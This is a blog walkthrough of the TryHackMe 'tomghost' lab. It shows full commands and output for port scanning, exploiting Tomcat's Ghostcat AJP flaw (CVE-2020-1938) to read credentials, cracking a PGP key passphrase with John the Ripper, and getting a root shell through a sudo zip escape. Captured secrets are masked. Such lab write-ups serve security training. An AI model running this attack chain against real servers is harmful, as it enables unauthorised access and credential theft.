はまやんはまやんはまやん

hamayanhamayan's blog

tomghost Walkthrough (Writeup) [TryHackMe]


Some parts are masked with ■.

Stage 1: User shell

Start with the usual.

$ export IP=[your IP]
$ nmap -sC -sV $IP
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30
$ gobuster dir -e -u http://$IP:8080 -w /usr/share/dirb/wordlists/common.txt
http://$IP:8080/docs (Status: 302)
http://$IP:8080/examples (Status: 302)
http://$IP:8080/favicon.ico (Status: 200)
http://$IP:8080/host-manager (Status: 302)
http://$IP:8080/manager (Status: 302)

Searching for Tomcat CVEs turns up plenty of results, but following the AJP angle, which stands out in this scan, leads to CVE-2020-1938.

CVE-2020-1938

Tomcat AJP vulnerability analysis and countermeasures (CVE-2020-1938) | Cyberfortress
It apparently allows RCE, but I can't find a PoC... LFI also seems possible, so let's go with that for now.
GitHub - YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi: Tomcat AJP protocol file read vulnerability

$ wget https://raw.githubusercontent.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py   
--2021-05-26 20:15:01--  https://raw.githubusercontent.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10884 (11K) [text/plain]
Saving to: ‘CNVD-2020-10487-Tomcat-Ajp-lfi.py’

CNVD-2020-10487-Tomcat-Ajp-lfi.py                100%[========================================================================================================>]  10.63K  --.-KB/s    in 0.008s   

2021-05-26 20:15:01 (1.24 MB/s) - ‘CNVD-2020-10487-Tomcat-Ajp-lfi.py’ saved [10884/10884]

$ python CNVD-2020-10487-Tomcat-Ajp-lfi.py $IP -p 8009 -f WEB-INF/web.xml
Getting resource at ajp13://$IP:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to GhostCat
        skyfuck:■■■■■■■■■■■■■
  </description>

</web-app>

Looks like the read worked, and there's a string that looks like credentials.

Let's connect via SSH.

skyfuck@ubuntu:~$ find / -name "user.txt" 2>/dev/null
/home/merlin/user.txt
skyfuck@ubuntu:~$ cat /home/merlin/user.txt
■■■■■■■■■■■■■■

Got it without any trouble.

Stage 2: Privilege escalation

Let's run linpeas.sh.

Nothing particularly suspicious, but...

[+] Searching PGP/GPG
PGP/GPG files found:
-rw-rw-r-- 1 skyfuck skyfuck 394 Mar 10  2020 /home/skyfuck/credential.pgp

PGP/GPG software:
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found

This is about the only unusual thing.

$ ls -la
total 44
drwxr-xr-x 4 skyfuck skyfuck 4096 May 26 04:25 .
drwxr-xr-x 4 root    root    4096 Mar 10  2020 ..
-rw------- 1 skyfuck skyfuck  136 Mar 10  2020 .bash_history
-rw-r--r-- 1 skyfuck skyfuck  220 Mar 10  2020 .bash_logout
-rw-r--r-- 1 skyfuck skyfuck 3771 Mar 10  2020 .bashrc
drwx------ 2 skyfuck skyfuck 4096 May 26 04:18 .cache
-rw-rw-r-- 1 skyfuck skyfuck  394 Mar 10  2020 credential.pgp
drwx------ 2 skyfuck skyfuck 4096 May 26 04:25 .gnupg
-rw-r--r-- 1 skyfuck skyfuck  655 Mar 10  2020 .profile
-rw-rw-r-- 1 skyfuck skyfuck 5144 Mar 10  2020 tryhackme.asc

I want to decrypt credential.pgp but don't know the passphrase.
Looking at tryhackme.asc, it's a PGP key.
Let's crack it with John the Ripper (hash.txt below is the key converted with gpg2john).

$ scp skyfuck@$IP:tryhackme.asc tryhackme.asc
skyfuck@$IP's password:
tryhackme.asc                                                           
$ john hash.txt --wordlist=/usr/share/dirb/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
■■■■■■■        (tryhackme)
1g 0:00:00:00 DONE (2021-05-26 20:34) 4.166g/s 4466p/s 4466c/s 4466C/s theresa..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed

It comes out in an instant.

$ gpg --import tryhackme.asc
gpg: key C6707170: secret key imported
gpg: key C6707170: public key "tryhackme <stuxnet@tryhackme.com>" imported
gpg: key C6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: Total number processed: 2
gpg:               imported: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1
skyfuck@ubuntu:~$ gpg --decrypt credential.pgp

You need a passphrase to unlock the secret key for
user: "tryhackme <stuxnet@tryhackme.com>"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)

gpg: gpg-agent is not available in this session
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11
      "tryhackme <stuxnet@tryhackme.com>"
merlin:■■■■■■■■■■■■■■■■■■■■■■

Log in, then escalate privileges via sudo

zip | GTFOBins looks like it'll work.

$ ssh merlin@$IP
merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
merlin@ubuntu:~$ TF=$(mktemp -u)
merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -la
total 32
drwx------  4 root root 4096 Mar 10  2020 .
drwxr-xr-x 22 root root 4096 Mar 10  2020 ..
-rw-------  1 root root   15 Mar 10  2020 .bash_history
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
drwxr-xr-x  2 root root 4096 Mar 10  2020 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   17 Mar 10  2020 root.txt
drwxr-xr-x  2 root root 4096 Mar 10  2020 ufw
# cat root.txt
■■■■■■■■■■■■■■

ok.